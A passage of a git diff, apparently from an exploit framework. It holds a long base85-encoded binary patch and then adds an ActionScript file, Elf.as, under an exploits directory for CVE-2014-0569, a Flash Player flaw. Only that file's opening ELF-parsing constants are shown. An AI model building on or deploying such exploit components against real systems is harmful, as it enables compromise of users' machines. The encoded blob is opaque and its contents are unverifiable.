zZ?66~aO}57m<lJ+k+I|F9_8HANaewCdrulE8#ImTZ9$#^`PVCCpRAy|HCiA@2xC<>
z3qy**Jqs-7)+vU*9<NP{_>%SzAx}7!UHCPFDg*^Xe`6_nTWMty|Jl{u79xhGZL$gh
z-&5be)sO*3=^%76pGnequUE6s8*@gN>gRf|7`(W2mu5jw;*8>pJfwH%gD>~mq{qTK
z)WV*Waz&D7_kF#RTO^Xt)hjAH4rc~g$Fu=~6HO$MK|NIkNYQ$;bZ6lF>J;R>w2ld$
ze!_s8e~lrtZqjK%cJGxfXd;|BWg;}ao9FbagOIBnZmJ+6OF~x7+7jR8vUR)fw(?zY
zyAStvfrwNVSTJ`tW$wl=t8@3{rsvcgBZvmE`Uhrc$%@gyP(Je!Qb0^t0Brt7rYP8|
z6f~A8f^ROuOaG&X!x!$qUfGZ<T=*$xak>29e+}URjKX>YZebaR(EOdMd9pHBHP}Wa
z>56QY?wV(CWE?e?kA&*yBB6h~G*N9G3PNAnSgd3|H+6czT59K}CjZF)(5-mjEsXyC
zp+#Ob#;+<qMtxT;tT24W#MVL4!iLtVq#6e_Vv7Eo65fyris2uffn{_8m==sG?ZYm6
ze?T?A?MMQjzJRFjCYR7-zMdwj<!NZx5E>3m>8n#l)opkCrRX6ktqYnrj+JTAp?fJ{
zRd9p&KijK;)$D#SIB&aU8c;&$SgBJLXai&uu0A$slamjmoDNrbs#V;Q+A@NH<k0OA
z9H3D7(5i)e<>#$V8}HJp2L#R)c>gP8e{>)#cHw@~ymMfO;Lyhm4HSo=DTIY-acf)c
zl*ZyM0iylOssaV;;{fx<F5YM3V;nq*^Y9jBQ1gGD$^AE|-G(iNMiV*_IiuV}s#_rG
ztg}BD+wNK5{d>qDo43$*kh>GPX(KX3RvOeHWvq=x!mz|09&XCMy4$3jqJ%}>e@cH%
z+5WcYZ7nMFoXWDaR&NhN5>kF!XhR7$Qi`^Py(G8FVheT<HnU(i8$_M)h^I>r+>hV+
z$&>9pw+bDR4-e;;Xq$8NX{#6VOThO>!;{brwmcmCY;6J{^a_<`dgDyGB<^3^|7rW<
zRGJaH05NYC8m8bEO!8v)Oi#I_e?@v2Ymj84QZ;hre7=_pDrPEgU75?)f2HpUUd=mL
ziPyd6<zk<hak!Va5uA#sPGe|BcteN4#Q%2s7R|&iRfET|^IieD2J~hJ?-pBkq}%t@
z+D`m~s8NCLnl+7T+IO>}3wuF6r@VU2(g6&;mP4r@4feFUJ5hm*K0=Z6fAe7}1pQmQ
zX;kz+10G0y#6q*s3y_whbKqv>-<y6<OlwSXU647YleJPrY+riJ4BmIC6CSoIFoT3r
zGHf+UE!jY&)3dW^n=eU~^t&1*gzD5V{5^}cQ5=TTZThshqCb#R1G5681l8`=xf@)z
zvmHT>6jUnBQjEZ<pug6Ee-8=Orz>^tE$c!Xld7+o{3jR&VrlyEc8A$0$fhNYbod1*
zj~|LoXT0ImHEJhBb%s$UKx8F?qH$-18G1`$oU^@-sHuV>bGJr&U^!kuVQ_Y{iz48x
zG_<*<*!|eauw{~(F7slt&ut%Q8xNT6s6+Tl!&rh8<sP20ldr-ie@t!2uxkXGrG|g-
zE1UIE`K<<>;BEdqz#j0|t*>@}N<o?eisV~;7AVoJih$?ZA8WdRXTki{b+3oRHVbW$
z7M)z?8hjW+)}2eH3dt%LbaU?DLpM)jV-^|KAA?=*IkCzO1@Ojj1B%cZU!VUPA5p*h
z^1J^EPHx-BgphJkf5Ri}$G4zUp(Mk$3LQm0R%e4d^L0Hz<SmDx$g8$0QW-tKvrd4;
z5!)NNWxP|^G>HD$YCzYybr42e7zJAl7#Phh4RdQFwO24H&|VM~<HJHjJpMFv*n>^`
z>eOv1oLY`-y<2b}F4wAgOGC3V<PH}|XN$zZW;X~r_IrT8fBf7pKA$E}U5R3?U*~NX
zpSFV9NO8+avDcb4%!FBA9P`9y=<bbC9nPaf1kppVqN3n?-JGEtM|@oj0`f1nRE53D
z^aTAlK{2EEwi~d(7{Enh?)eX*KqoLCS;p=#%_;t=cIS(o$Zd_P7G=X%5(G`Ti)Xf2
z{(zhRzi#OYe<@a}8nCq5*@RT8YhDj3%8p!e2-Xfc0{qMOoTZ6#Q(M{3FHiqP9%Cbi
zI(4!D`Y-8WML{DMD9fP>(cPDRH;qr}kFm?%)AM!sw;5tnW}Ksg-`MV!5xCS|$cQAQ
zj|RFQ3fMO5p@a!86rY`=dX<OM=?P>CXeDk`cOGLxf8Q%Q&qRYqL6<4W`3_Y<yA`x4
zBa*C$16I(%QA)ZH1q<Akt9F=_M_=96JslgyC}=kET=n|yMGGE)CIFb~geo-<l(LS)
zd6WXFrVA)1M*^KCYBUD7Q?s+;0-6eQ&Bv7(8@8ebHr<9$wXyzgHmI19d|HoEZM(Pz
zQkECLf6Q1b>#~M4;ne)<p-_l_Jj|6n6Mq3*vT>4Bdh7~MN6A~_D!7?H!!l1@$D=L1
z_yu+D$#XSF7bGO7()-!==WmuSacH9&2{ktcvfQVE&+716EYMACKw~sFsq&Zo{-x&l
z-sM>C&Y1)7TnhL?cH<Y3qIkxIW`Ij5@I7Dbf4`jEK!8OfK)3D{z6907b?De&)fT~X
zh59<@7|WWYqw-U*{Y@KAOC}Fh0!5>=+a`;=X`i?KXs%T-)6qmQRt%kTqaF&0vjA{O
zyJ<anl>6%A;9F4sFD41bbMS}~en)+SIXO6X{yq2pMxZ)U#(Kdc2AD+bbA=`+FF_w@
zf0S4tL;D^D9Y!te#5Rbk+VNLshSRv4RNTsVK?doO)&3u6+Dl=bwn&CxjyG6->zOz&
zxSo_I-QSzMmLCg3bTG6I?BqG?lR}}zPD2)o4JaO-E&qdJW=7tz^oVJQkX$oKK|$Z;
z^)>utA7Ass`Gc`a!SCwpL{86+LRoxnf8|GEgrk{%`1?ExhRN_`c-8xLbZN)68qgEu
z!3O&~wMXAQc?H}L<E-mR?`obm%8m&E)55C<@or&^f(%GU5xH;_wX|PHl_@NV&y~hO
zl+y`y9jFub<D0Ev@cK670tauD8V7!|Kb@7VC1QQURzn9c#bP7y`jwOoA>jGHe@L&J
zL!ZOLplzoPILzwMLKDbht_mMOJe+g2ZhRa4EGDrSkY!3Dgjpe9PTLMe2n@2GG8YXw
zAgO`Lv=vbs!K>C{x9!!)W+8j{saZgaU9y?W-&MCZztpfA&P^QDvOB2O4K<k^9N&4_
zgx3S78f16P2p+u1cMXq^oM?4~f0=^UyIz`r0&;12b|~X$OBl>GV{Agf-6eb^KMnY{
zR&eHZsSKO&+cGmSpi_4Hk-cD#JLcR4H*J3P;@EnSETD|)3;0zzqE4)Z0<MboK3P~$
z%$nCxovg+3Zu=kQ1Uzb*@A`c6sFv!ZRHgv8<6f3|0xe@iMXv2+SUs1Xf0Jr|!olb?
z-PoWudaJuZB@v|>rE=V;p{%-f6%muVVZy1z+wB%dL*Fl~H$h}`3?6)glJ_G1!Vrb8
zMu_#n+BDm3O&|c?st(HTU*s6c;(@86z9u;aMLz(4Iu(8PLndDH$J^6_+_@Zz+$KQv
zD=>l&raV;SU|7k!*C{C6f1YS?iVwjE!wYAWl#17l=bG^;s?@3ngmC0nXM;opei3NZ
z`3+}F$R_14OcrLKEI@*nF$C;fVZ>xAyit0Ij-!D@2s`KG=?H@TM!#+oo)@qz+%d88
zT<jR@Y$t|$K0-_a;uJ@z(JTJyn`P$Cx_zs*`|Y=6dyQN5iKn?7e+vdF`67_Ynoe|K
z#{T|!DzQ`z@BTl-v7V$J0B-}I5cud%qk{cESSqzxj}fo7n>v!$JpK29npYs?G!p@)
zb3-2MWXLF0svPK*tJu94K+GsXlj8N$1EVYO-l1USSL=p5#Y5A7$!B5r_vZ?wvbc_w
z+ys|E#35CeIlQj2e^pxi%(fi%LwwoE32C;;L+`<~REEW=f(4?c0{fqXc7mB6e5*w<
z*imi4-3lDYgzuhFrUUpah$0KSnX8Shbex$X2C1k~e=PT}yw}`UMDsi{um@e$5tzkr
zu-#cN#IVY7G0FBHG$01I{*(-%L{4KRSDd=HJm?4n_@n4ff5Fw#BH`C7w<C>2Cha(_
zL|<NOWdZM{nBSb9Aw8%LBX7n^7KE!&R6$Q(1hI8epfv>Fo7jZli4fws^}~mSrCOZ0
zo9Q>V-{U+ba|IU7UMb8tCl>cXS4+~!|C$fu>@RPue#xb?m(g5OW5oQ`)59Og$H`GA
zQg054sQ8sDe;lY-fPKOR;0I!X8=$qLaovZP&NSl}-Zw0n#eQnfy8Sc>cVL@Sy9#Mj
zo)O8;T~y-ftq@f+ZM6dcRAC$tDc!Lqq{ZGchywLKj+TxRS7HI3pe6^N$p%PC=I~!l
z7UG4+t##Wz{sN5a^_7A2WeeMg>}5Pl-;>HIB}rP;e=Bz?Rq*|)H!X908v?skq&06#
zP@ozK{d0U_*)^vES<d_)9OF6eTl4aI>Uz3ZWIkmkCXdOr5=N;pvu+q{cPLs)nGDS_
z2BlU#4>~J6#+1jAbidZSydk(&RwSn%TsB3LR6*<RRyg~QCR_IdBXU_pFw`8!-(1~l
zmT4N*e|^=<efVs_sX#5<QVJ)6AAdB?XBj>V7nJk;h2VB@S^g(K?^hGHKcKnB6pAT>
zXn2`dJ8-hcT6{Up3B3E&tvX<?0s|p7h(v}Onb2OPWasta{<+YfYzID*aMYE_xMs#d
z{HLYtzmxqoneT#}z%Zxe4Zra?*;$(sZV-8Zf20>YHA%D2>9rVF6>tBXxd+RyY85A*
zq7tiDX@}P~VC`llF90`Sx%#>qR^|~56pyg%K1S8}$$M~WlZOrAa}*=HZGv>_YM7lf
zAohje*(C@a2^qAxv1WQ7vIZ|3=okzokNk6(5?l|mrsY5SQOtbBq%Iuk&~RBBGR$)@
zf0!d{G4LwfkM-c=HB|w<8El26V~!-zx8SNQIb~FxT3N%i*|?Oe6K`1g?MCWg5k-N=
zg{enL3hKQ{bh%X+zZ2!P7|8{Q`NzvHy)%16MiP131771FZb}uL)d#kQ>~2Zn6bIeL
zjBNvohEe5mT*^eh7&+-O(EGt&$=ATHf7iJy9GFBsTv~^C*U4BI2ZN6Ui7LS&qcC~D
z6*Ge@v3ydXe)oVl^^a=oGF~k6vCk%Ck(qv6cinj?o)Ia1lk+G06wfn@l$u}Dm$tP{
zmT=RvcQ1B~U3Ajd8dA(R)YLjolI~uZ2<d7;wQ|d?ttatPATQZRh1-5a`%{g!f1*SF
zd(u!FmGc&e*9Ssd|HP0Goi`hI%-Y>ivnE>l{MMsa8ojWo7El?AzVb^HSH&`yt6lLu
z*{c3#Q^MDLm6q2mQ-cuSFB92VCmGu%$g}G~K#94My^{mXE`AoMfJTqIa;@LH_M_L8
zd=Uh;=I3}w85p?)lajs7XII<8e;UUSfJ1E6;aL4ekdr`@NEsyhj{)dOuK_WY#<HXM
z9Nzs)s~BiZ_fDUe|MrM2ER81_Y&n*pxY9;a63h+raktrSRz^jc%p2T#qAHO4>ni6R
zZ!Z*!gTaIR3)2kVn;i2vxr;NYZlnU&_R`CDPj%wwf7sDC0xz$=(wf!lf5w&Yku*|S
zSloO|?4w*;#!XUBAYDX)prC|Tmjzj(x6iL|Ya(exb$nndxw>L~N^Erx@7VzEE-*1u
zjCZ$Ydp2hN2UYADf5G_xV+3FySDJ?i%rbsL72>4>>9mTQm(#*6dxThtAq&y5PSbS0
zM+wh^$#JNx7|Y5JC-g`me*u{YNMF-*#KTpP!jwqY_jMlw=U}H1vB&;1`muFIc*XD;
zY9Qg%3Kg~(Uc2f<KuxY~3d3OR%3v}zCkyBzpWmrt6t6MwOXm!|;l4Hw|JPUj10-`B
z5}@84e0=OaRZVaGo_*F#-G<|=bz0<CK8R&`j5UpPMwO0%k)LdWe=sb$pgoU*s(zbf
zhyc>+_1hPZSRvkLd2r?Y%1v6W$)d)n6Ed5xHw1i6wf}FIcq@T&F{<1IAHQ;$zIYm+
zuZWc1+-|ul25~IHeAYkl=5_)Wt0WO@o?F^^KEy_?La&v<#X2XQSK{;bt(zBPPWqW5
z`4_MCBbXXV@sr}Xf4uhwuFQc=*`LyOQeYX`gV*4{iw;E=qmul_?PN_Ki^1g3i;1=!
zE_`F=*uyDO^foA2GJ^#rXF$54NTNKRrv+_Oh^o2}GvGgZif{VYT`p!cp2`z8T~`8X
zNyO*$gU&22x7{AB!cf)u89+YUFJFTjC}$@)m}PA1H9rL}f9&op1LrDuVCmuz*dkjn
zRQ93IAiB$^x9?A_WfZ5nPAsZu5U*i8v)bK0!u(lkVLjFW8xfR_kbMGWa{s0C<FrSy
z_o6~#glA%`_HX&5Qg?$9{eq+}BVvB)cy44kd|I05yZ{u-i{zA((M{yiLFqU?&Giyl
z|IDGe#R%x;e@zBJC%-`OVLjiVk}9-5?7leHD2)I*NQX$(kpr`2_xFV73@<?1Bp<J<
z7|x8_4q=Uyp#SEb3AnoFp&vB4V;td+G<iC3)Zsz>#b^tGMp$7@5X4^ppE!=#yhIr@
zFN0A|g`+G;dJD+W5rFH^2n6>9*VOSHJTt&UQaiO1e^C{Oyuw7ST6F2At)4;-Rq0#h
z>{6Rw_3}_{W>?NZT|J_$v8`d{N(@9z0zypc#o#?Tq+u`IbPyKl=cV2Q;W+1zNNwjz
z8ItJ&LA~SR;BWdy%K|)9ZwlYexpA|mU%JILo=hjfr%K=?g(FpOjL_2$FGm(-Ge{Ui
zsYT0|e}==|B1}I&rY{8?Mc{rJM!mnuHuALy0@r!Y39ddSxe{Q%Ae9x|;RW#NmU=x$
zD%-qET>qqxKP}|{qLbOZS{W-x`CS;E?>$LA-FumG;D_~Gac~ZHtO^_|k_0M|0XPNv
z3g_AAWKo^bmeW)(Qr3yAs639`ey9}`wteo1e=l}7ic8{qr>|gg49Q%IfFqfQ!t7TZ
zb5Ln8Fv~L$Uu0gU(Nf&dO+ZezA~_-VWv1G{=qdh6pN7d8&QDF8I}#Os)6KD%0N<v;
z==@-Kg*&H~*d>#QG`!2#bs+MG&J>1^HB;?%buOSr1#V-&{G=$bxOpT-wG?MG8S~v3
zf6x*78TKp+2;#Xq08xr9t6FU_)DMgRL$XnXqHyy0;WIS8niY8^>r&Fd<`K(vA^VRc
zFGWv%D^l{Q9Xw0qt!;_9_Fhdt^<x72m{{qRvOgBrYyv4!%>}pQ4Y<UK*yvKHE<4{C
zoVowr0F_@-N~gnF=A7cz+N}ZH@-yIze<FP$*`Gy4k3dCxAwt1te)naXpa&{_1*qBI
zx}|ade{ql*TdAxGGjgeVN;*&dOZhwTo5o4je|q7|5ik$0GOYNG&@t7ep5Zx?Va`<b
z{?OvP-Gw|Jtt9(QX`q?hoC#wDPqyEbtuVw#bg}5(vz(k3ZN3n7r^<;S&(@GIe>z_;
z(bLdF7A!AI&x@`7?0F08j0wGAs_9P)iu|=T#!mU>>?b59iHHtXFrJ(Zsy|!+Ji$na
zLH~+XC<0cJ$+ZUi5Zo5mY8>u`_3k)^cfJ%7{xpAAow^BEuv<KA4?crKx|7<T=zUDI
z1WDNsX(E`_Yt)%^G&$_QV>X$4f3xC@FXrdEm|4&1gS`5CIhM505ijpHOAjrya>Wa#
z;NJyfJQV%m$gEK6i0ZiAoC`E<*^0JsYYGg&LBB?df%634ZlgNtM$G}OB-Mp0IYn;B
zE<gEVP#hPUnhz$+t5aaBBIUZ?URn*72-86k=Bb2B#5KLAQ>6`B5TR1Kf97g>2D7Lh
zOcG@~Z-PJ@Fpo9ZrO9@2*!7%3D=F0GFvf;)Ph|B%91*`Mnv346OTzjkz6%5<xU=x|
z_<`(O+dH~vnsy_O^T<R8cGseECf4H^@i=l6O*&ECeRhW(n4-20XvEw$^eAw@$0%67
z_Qc`Sep$iH&>!Wa?kykBf2wRMS~0#C0X>&TF{AwSA;>JC-$Eu9_}x{Y-o9rP-C^b*
z)3v{dYHrBe3Kch?V2DEaEBr_fz^XY*!6OyzljGHyW7@AWnlixH#Or=|Pd3MbwIb-d
z=36uqlKH{J_aXP5Z74S4(hiy8*Gmzf#%q+yS-!^Ba=I5v6Z#yWf9p+w(XH}}C+M9j
z@xhGuX5jR0z<pi*WUZ_cuB>q5m3_0n*so5$wHP=fARl@&etzQa+1`oRhyUwiLxTwD
z^BJ0oxq$F*NEA(5&`G6^P^i?uDDSknFg5^0(1UBm2%i<E8tE|~Z*?1<3C3B&&2fv{
zN6YwO!E!1*S=hhJe>nP2Fu7D)HZ*Pq>5BGALHCs_y(SIu=5?fhz94M;25pgLzH~<;
zjdR9^o?@VBORL1w1+UO$I|0Qth{Fh!`2YS$xUVjLJUd5lk>P<()AZ6qPlym<dTUNl
z28jxVSzgJ9(BMMC6hQ&whD7bB+EsTYz5JmJGl$#mAajZWf95$_gV<mZ^H_65#PW<#
zsV?o7>S6yzFK(ZlUgOI%8qtjqvh*M$-Eh#?wYlAKDo!0cGcTHPU1e1S*C{LTbWb$T
z7k#nezq&Pg?3p(TsTsLyQ&_i`HyM=$iT+@E=LH3G5m4kDN~)llgX&ol!^ZCSgjHq}
zwmz9)K$@=pe=OFW1b9BJiAnvwr(yj+B4pI#PqbNxGX6}Sl^HL@YCI@r{uo#53STY}
zCEx7K$z_LvfQgT6|J>rUB6nbAnjw<l<RKfofPp1dJYc8YLcifmi$d(v%#@2m1=$uv
z67|3i3oF0pQ^IOK$4Ms0sO?}@AX1ufTSoaVr=kT&e;$rO`of|oH=>|Jl(@<Y*~xFU
za{SZ486)h}C4BU>(>~)ydG*4Mty&t{vox!AFxC>ky6n)!XG4xcz6}M+1?3lUYNICE
z!IOGw_t3n{y#?ka^RTIywY|(|<7ZwmHoy`5bduG1P>Ty?^<N}LYe}lXi*^5Y^LHk=
zs3qY%e|k2dD?6U|51{5h0ew5v=1Qz1Y=pcSM=bT?qcstP5wE=Hg%JMo_)=2B^A80o
zCdTpunz>u3|NA#1Rg_vwq#`}#_^RM!I>^$uI7D<gu67Od`F}%mRql*>DgH!;5W8Mh
z+oMtkME{!PZ$2dIslGs2GysPoFw+hHH2<}qe?2k+(jdv93a!!uhFNJIKjmYTmOj6M
z2D@BJ%as;f@7!VP{>c^MuhWh4^h1}0GB5LmuZZft?08RILP~x&45BsZ#1!BpGxgLy
zHw1vH(jd711}*0&nd<GOv~C&hceR$p$Cvcz{Uwzyplw-@)?2^DqqL3negnTYDcgK|
ze;Mt%t|LT!%3Z~-<Cy;GL%o|7d==U*PA0123wbZ+mwLQUZaV1+RAO{!NYieE;6MO<
zzE=FLK({u!F9*YrX~9cJd2bt@Vz(ub7(vU%xvnj;g~jsMeeLP-*g~eN*Qp0P!u&@Q
zJfKfh>lBLk{<eNbyY2!g!3tn<-eN!ef2H=-^>#~Md7aQ!(4t7h7Bn}o^yXHcG6&!=
zkJbIPtznE=PsH_cb5hnac=h!q2eoOFwb_n9xsSv2Wfr@gQUa-MNPUf@3fnw}aTxSy
z_r?@+&K*Wv9ih)OtQ;5xIl_?XX_~Saa-}aE1t1@O`weB|kJ8IuVo1f=0#(D*e-PLj
zhgLL?oEQ%)-WO{>{3=lS-+gct9WS6j;(6ld0ceD@zE{$fRQC;tpFEKrevC6bS_&6Z
zbT}l{0gH@^y+E@ZFq2+;vNNvKR(AG`=f_=sNUwUx<C6ka;2QssA=Cjcyv#bZ9B0SZ
zTY}2JR~eE(rVDkCCpl+<khJ|%e{f9Q*qgyzmqZMgaAbi0U6A%MmR!;!cc7rLA>Ecu
zzHWk=|Dc}VQ+1A*keC4n`?ocT`aLDZO2g~1#jBQz+FirIuzBP@nMBN|gelyx#wTy%
z=Fj}(m^Ca|7ss|2NoxdK_Hnd0Vstzt!h%i9h%-{^Y2}F~y<jEq>C{rme_eY3iY${>
z-X3s+<qtu;3jsii-8>=0aI^p&Y7(Sj8!(gTKNCEDTGdqXR*f?-)*zdl<-5d|M}xL<
z4~EM(Ryp{w-s0XafyN{-c*j^z!PYzty4xptOgpu3m@+`N%cQ<n?g_T}Y*Q9=D>A(A
zsncrw?Km&TnVP0f3|%R1e@c?2bkO53C8^jhEN0PQJDkEz6rGRqxwBskm=*Oa($iiM
zSyAz^m-PZEh}Pd#fjF|3d@8eST6;`}8!lAD+c=2Yw9gu*yg9_fh3s5*QraUY>HqxR
za#MrHfgw+B9`|an47eOKPMls}izzljV(_*~D$rvZ$r===sQ=@gf46*8#)EVPD)_JX
z-+|~)ak^op$5$m`K;ANuNVDcW-KGvO3^c)J)Ny|x4qA#7!3lE4Gs{+)(wvL5WT*Yh
zI)`l}WO$`oEX%7Bd8mR?|0omevFjXqg&|vyf(`=H8$PqqG&pgsG=>;U6LoJu)#qoY
zEj&VN;~<ghXg}0of0a>uhjGr9Msgnk$=B=PL?>}ps);*QAG&=Nq%6Y68q*d*H^3UA
znWU*b9hg6m>up)_ak2>#Pe_Iws9DcIjZ8K0S?u%gpaf3PgQr0J9FU6sC_EJ%D5+lp
zk&HkrCsOm|Ytaq)i_E5=zp5>gC|L&}#b>2AokhI~JHN(7f6!SPAgFhasP!<Y$qwBW
zihir8$>ORW0H(BcThsPiw$cX7?pXoP;Iki2fxG*!9Zb)hUpQP3pvGyuoN#ZyoG$AO
z#)HwnJR|O|Vmuhb4+dfAEN-C1Nr@;KV^0(xtq8D=1Ye$&?<v<NxfoINJ#F^RV5v%B
z{x^`AZF=Y+e`dDQhb_k}KT0zJY{e3_F{p@e(tR`jKnz@W#><~h*%qX$*g$J^)UOyl
zOxpDebp3+y48#~5;v+j#>$xn^jj8OB<MfV6p*emm5FzJ@{M+-KCLFL8Kx4d&Hz}9^
zBP)<{{4En$V`Xqh|L!iA@^2U7yWA$_y#CF8F)kdve^@~3nF@;J@XXCNVr4}XzGT3*
zZxbmyiCgs28)P6fnns@+ApgJ)+fMR3J-9&e{F~Of6fmw}u+!sJ@=H9B7)v09tC(xv
zzC1~bW<b_YM9cW+F8`TNSUPBy`=o(vb-#7E6dpO{haB7VgWQ7gfI=xjB&C@8ff7Rl
z9Q=PSf96sG*{%Kemz_pacjmaFI&VP4lzBDX7=xrSb;6$bU$`*Ryn)yM>DmlwL1qCc
zry0^9%E%4uZ{7;GwN^ItgKdv?)t4I}k<#=FqpVqUt=BY~?jiO86(PeRKal3tb}e?b
z!}C5I7n6AK!u9~96ix<?Ehi;6k-W*)hUFPUe>+)UYi<0^rM6#Mva@GT34ambFWO9i
zgkfh+hpQuUB6{iG8fuRewp)MuI?zzx5^H%VxBc#c4E*!#?VVAqeqoRa<D4>4yVE3}
zlx#tgKFDY3eQ$GldA;z@$iS4gDL2>l%Oku@(#*~(A&vF!Yf*LV##HYGbxi)|ootrK
ze^nqG?`!ag`oa31x-d+3pzn}O2%wBa(?1&YiD19sVd3q9k+z?U{5~6vUw{!m2foru
zvrb+0cEH1CAd!zx&kAuoA0E_#)Mx>niM~$svkx(*84`*9`3Wv!DYH~vYlYpqrKMkU
zmEfmMjI6>(;jm@;{HPWCd<gAlGt?`$e^Ws)X?aPN&^`mCbc4!G$nyuHM32!SSR32R
zlMT##DV%E)r`L(ACG<W_=lb3zIXqJ6ITtieP~Eu5U~|FBj|dOQOU?cmoM)iEfX~?$
z7=iCxSz91*eT)Q*PtS59z0B1%0?sp$zv<~smQL{l1F8wCVRRSjWQgo!x(i;!f0n8G
zq)!RC;90=nH5?ilh}G_t>HkioaMO^)Y?SIn$)R2nW2ijLEvt5u2;neaKL9DMvxhQB
z$z^gm*LN%^FHh8RRkx~2V*Tp}NMrv5T-3v&3T6P)!=y*=G<)h|*^?{Ls9sHg**C@f
z9R2c2DbDVC2@WNGQlu9sJPw8;f9s;7l__s}K{qbD$>4079b=WB_kE|FZ!CW4(k(!R
zpijy#kxWzA9Dk$ClDURq&r9=_Dk%Vf82NGib0vRP37r)D7sFN3F5#>CiS&->-D;`Q
z{n<j>Fwka%?6^=xYPEsQt-rP*tpd4$PDM>SDyxt@XJS+;XB|x3Z@`RHe}iDbN_%Z}
zQoDrboz&?b#$0z`MCAjJ)W=h8#o+{*hG3UiCTxOb!h`D(;5r$C*cRUwWgj@?brOkp
z0nuO?d8q^M32Iu{t&3l@tWjFTy0)sXFX<s<wC0PFVu>6yegn4acBk{uB7MCK??;Q`
z46Nb~s+3pb8dWg0#|!&hf8<z(5|=B(wPH(iIb$V4-YeM0=iQJNA)UzDOn~Bs>y~I;
zP^Ya#;5Q6~YZK_IwJchfk!KvpoePJrL>6Lka&y<#$t!K%NXIY#JvviQr}6-%{~yQG
zx`4KD0!<t+R>J(R&Qw(w5<DAlVlx3k|I<_c)hHu@pA7?I+<8Z8fA&0qloIT=c&6no
zj}5P8^6#4nO0bPRVo8rb_)%2X@q({)bh3N%`f0X4I996PxtzIyAL*Uf>O*wEFA+Fd
zx>vfwo>m1E|4Xz~PvG6$UYWsK*@=OrBDdI%po!-N`rU)|bbCov9<YP-=)r=)UF$Q%
zT==@6NwdWszv_9Re-*43kRb$Iv$cD_1T;~{t2=JVn<Fo+gy`_1)fw$q34F{EYSsiH
z1CE&nfijWC){Bs@BdfAbcZGHt+l5KgQ99xGR&PJT`DLD(x_xAiKr{zwY;&&onlj_*
z%^J->OZ|tXLhU=iMH+=N0*>lwCWuqRzFU~max1YD+G;7Ff3%(F499<^?3)t*vJ^P~
z>0NV&7m)q?le~9bZY2V7CqUM5>1dG(>4g$17!3XQnP>hKEl@2t8>VqdW#Xb)>^MAy
z)W_*`mQ{xSI+b*6V1;hGHE?Ty9h;djg!YIr2L%g5-fD2Db)~5?6H8#6a(%l8@1+rk
z`jpCBurHPie`ACiE^Y{V8Wk8+3(Zto;|SCBtK-h0&C+qK-$aYDL&r(<Z@-oD068(Y
z%GmKIs-~kg33@=`2JXG%;>M^M2Syn2O>P^Jf2`=5eMsdTwU}xLfg)ES%?CfoK*hrE
zd2$q$N=T*wTpCaStq3JWig*}y0nY_6`dj<y{}d0Q9k$x^34e^(D2`TWN*xm%Webia
zj?lbO&wPw5bgxWBN=LgE+}v&zDa!{558>}ek`f4S0alvTZ4SI((*8cra+e+EaH)si
zpH&fFD>hu9-ngmH-XbL&`U9{V$kq)v&xNC#2#>OawHYhvz%0!x8;DSvQ>7p~8TSq@
z-(ZMaTW{7yM1SU&JKh4{FZ$b+HB>YB9&8Pb$Am=g0maAArB*IaHUAa@S4GP4u^lRE
zfD;A0B@ypN;BeXXV1qr{G7#uR`B|{yn{}dlH4w_-z}o4Yq!`D2v<`F6g?0b?ib!t=
zgy!$f9K{|&#+QhhBg645;xB}pr;i@#((O1wbdn^tq<_Bq;{u3Q%6zSJ)z&+DSF;Ti
z>U7R%wYD}WF!oS0WsS^Ge>+(8Z)1~{qSGu3CFJT)CKzWk94c{HK{9iaC-u3DzDja`
z3Kh_o&(7;y!1(!6E7~x>;RFON5PXGKaQqUFEIUFR)(;CxX)N3k4L8OZ95MmJZN;>i
zXTKxc9)AIq=JjA7lx%J)D)iJK>4X1TxXrQ0NvdU}iLyg{-G=$Gl}X^EEo9%PjLRrW
zNA_jCOz-=b077cn9O#_c8X@zHTF-;o=Y$hgLbI~Yy@ni@jRFMCeKstcJmPfIec+s#
zXue1K64^m4Vw3$qI`_y^5W0T%PWby_nKUMGA%Bc<Nek7Yl~lp(tB5f?-8v+TdrM>5
zf_P|&?e<PT;rjM?*2}E4ir@+i$i>G)dOBg3RDDlP|LwO5Z(kJY`dJsYmTsdyaZ55l
zA&*0dAGjl9p+e>t*!5i(FL`w(;MDZ-;Cg@=S(Bdb<6*Yj>A~3C*f&fbrxY~xZ)sUf
z)qg$<Tk!0xk5^9OPhguFyih#-k|<EcIs%qB<Tl4a_KQS?M91Hb6%HA|00Ina#!C@M
zf+MuIUNIcLLPQt8A=73Mdabo{m5a~!-HC{90B+3i#A|VWV$@;UIX>2;1=vW7X-8#?
zKq`k9IWec>si^FG8p~w+BgB~f<U6UgFMq%?s%CkT*luc(Zs)=0hc#W>-kPXM4(5%L
zF>>^X^3{*mmEiVwxP=K1K-A#}wla*h_YQ@8T?Hz1c~S8-$(uleTw=>9tr=!lg#~YN
z$)US=1g0)mXZ~%5!O@9I#oaq4?f*b&Hn)GGCuP!-tIpv>2I!A|z99DCZja`K7=Jkc
z_<`ML(fWz!E*Ml|4sSc8cqhrm$s^UqqoqntY5#yHk*ywdnx4{aOtw(i#p$&)k}U#i
zU-Q-UCjt-#okV+pyDd1dZe$3T!elzfQ+-LwB$%N>IEg!F8bX}B^=DZ*Y`5|f6h{3x
zw02~3QAp&_QGx`Kvi9~*Q~0d>tA7_Bl=0whCII-(u&<`R*ov5xaLn)?mr7l0dc%G&
ztp-8dj3<<_*`|bD$l}8Wzw4L?cYw}zul4)3?woy+Dvw9-v4EKJSjj$PiGETVKAb&R
zz$A9x)J_7M5fPPD(#=Uv=t<GneS;gaUxGXXC^TQl<HDLA;4V1s#=z;yn16X`a6MYu
z$?_l{H{V!Hw^y$VdycUEN9EEYRU8#2!M^3~%5q$7wbASNctO@83VdnxM^X~OC3PFr
za(2dOSfa_Ub5ED7n|7;UC18y3@G+J*<((P1bsWLlzioL`FF9TYYWSFGlCxFew;-5c
z$sPK_M?N&cGLuGtxP24bEPoDJ>t-VF7v9B-<bxRbE@p`+^mZ-Slc$4gxWN3VFfKc=
zm%x`c;{fjCU#5{gp_N{&8z|;CxfEe^6vZJKz*32Q2t61vApgXmkCIfC|AEv(17cm#
zS8L)gkQzVE+qr_*Qg3V=M`DS7OC05oo5>QCdHF+mNu!BXr=-dBW<qO630!`0C%0Rp
z3Mg*!>r~mHe9kL^U=!*igy$COO!=d$A_@5tsm@rRW|+JyLyZrJVuUEbzUcr#W4zP<
H{hVyxoAAw|

diff --git a/external/source/exploits/CVE-2014-0569/Elf.as b/external/source/exploits/CVE-2014-0569/Elf.as
new file mode 100755
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0569/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
